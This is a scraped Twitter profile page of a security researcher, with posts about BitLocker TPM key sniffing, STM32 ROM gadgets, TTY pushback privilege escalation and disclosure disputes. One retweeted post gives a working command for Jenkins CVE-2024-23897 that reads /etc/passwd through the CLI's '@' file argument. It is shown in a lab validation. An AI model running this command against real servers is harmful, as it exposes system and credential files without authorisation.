gquere

31 posts

gquere

gquere

@_gquere

https://t.co/9YPHaCPTZH https://t.co/6lpNt19rI7

Katılım Şubat 2017
4 Takip Edilen40 Takipçiler
gquere
gquere@_gquere·
Wrote an article on exploiting a partially hardened STM32H5 by using gadgets from the ROM code: errno.fr/Overflowing_ST…
English
0
2
5
173
Simone Margaritelli
Simone Margaritelli@evilsocket·
* Unauthenticated RCE vs all GNU/Linux systems (plus others) disclosed 3 weeks ago. * Full disclosure happening in less than 2 weeks (as agreed with devs). * Still no CVE assigned (there should be at least 3, possibly 4, ideally 6). * Still no working fix. * Canonical, RedHat and others have confirmed the severity, a 9.9, check screenshot. * Devs are still arguing about whether or not some of the issues have a security impact. I've spent the last 3 weeks of my sabbatical working full time on this research, reporting, coordination and so on with the sole purpose of helping and pretty much only got patronized because the devs just can't accept that their code is crap - responsible disclosure: no more.
Simone Margaritelli tweet media
English
82
489
2.8K
364.6K
gquere
gquere@_gquere·
@indept01 @Dinosn No, unauthenticated users can read the first 3 lines of any file.
English
0
1
1
2.4K
Nicolas Krassas
Nicolas Krassas@Dinosn·
Validating Jenkins CVE-2024-23897, with a quick docker setup from my favorite github.com/vulhub/vulhub resources, java -jar jenkins-cli.jar -s 'http://localhost:8080' connect-node "@/etc/passwd"
Nicolas Krassas tweet media
English
3
50
165
21.1K
André Moulu
André Moulu@andremoulu·
En raison de la situation actuelle en Israël, on a quelques tickets pour @hexacon_fr en rab et @Cellebrite serait heureux de vous les offrir. Pour participer, il suffit de répondre à ce message et on sélectionnera des gagnants demain (12 octobre) dans l'après midi.
Français
35
22
30
14.9K
gquere
gquere@_gquere·
@jrozner @HockeyInJune LUKS supports these encrypted sessions. This is a BitLocker "flaw" possibly explained by the fact that it came out before TPM and changing the behaviour might cause retrocompatibility issues. Although it stays a "turtles all the way down" problem, snooping becomes harder
English
0
0
1
48
Joe Rozner
Joe Rozner@jrozner·
@_gquere @HockeyInJune It’s very possible the TPM protocol addresses this but I don’t know it to know whether it does. However, encryption alone doesn’t fix it, especially if it doesn’t include mutual authentication. 1/n
English
2
0
0
32
Julian Cohen
Julian Cohen@HockeyInJune·
FDE has always been a checkbox. Will this research change that? errno.fr/BypassingBitlo… Everything from SEDs to TPMs can be decapped or bypassed. SecureBoot (if enabled properly) could prevent a modified OS from booting, but it won't prevent copying the unencrypted drive.
English
1
0
0
426
gquere
gquere@_gquere·
@jrozner @HockeyInJune I'm no expert but one could argue that FVEK is a more important secret than VMK since it cannot be changed without re-encrypting the whole disk. Rekeying should be done by changing the VMK. Also this would be easily solved if communications between the PCH and TPM were encrypted
English
1
0
1
26
Joe Rozner
Joe Rozner@jrozner·
@HockeyInJune At least if the VMK never leaves the TPM transport layer encryption could theoretically be added to protect the clear text key in transit and a malicious/compromised processor can't request the key
English
1
0
0
40
gquere
gquere@_gquere·
@jochenleidner It can be secure if you protect it using a passphrase, but it's rarely the case since it's more user-friendly if the disk auto-decrypts (which is the vulnerability presented here).
English
0
0
0
11
gquere
gquere@_gquere·
@spendergrsec Sorry for the late reply, not here often. Thanks for your continued work, i'll update the article with the source you provided. Cheers
English
0
0
1
17
Brad Spengler
Brad Spengler@spendergrsec·
@_gquere Thanks for the grsec mention! The 2016 date is correct: #L891" target="_blank" rel="nofollow noopener">github.com/linux-scraping…
English
1
0
2
223
gquere
gquere@_gquere·
New article "The oldest privesc: injecting careless administrators’ terminals using TTY pushback": errno.fr/TTYPushback.ht…
English
1
6
12
1.6K
gquere
gquere@_gquere·
@gabrielthierry La sécu informatique en france c'est une demi-douzaine de guignols qui font les plateaux et 500 mecs solides qui restent tranquillement inconnus du grand public.
Français
2
6
40
4.5K
Gabriel Thierry
Gabriel Thierry@gabrielthierry·
Vous avez peut-être vu passer ce rocambolesque récit d'un hacker français pourchassé par la CIA. Waouh, les supers espions de Langley sur la piste d'un simple ado, c'est vraiment une belle histoire. Sauf que... Spoiler alert: ce narratif semble creux.
Français
8
48
122
85.8K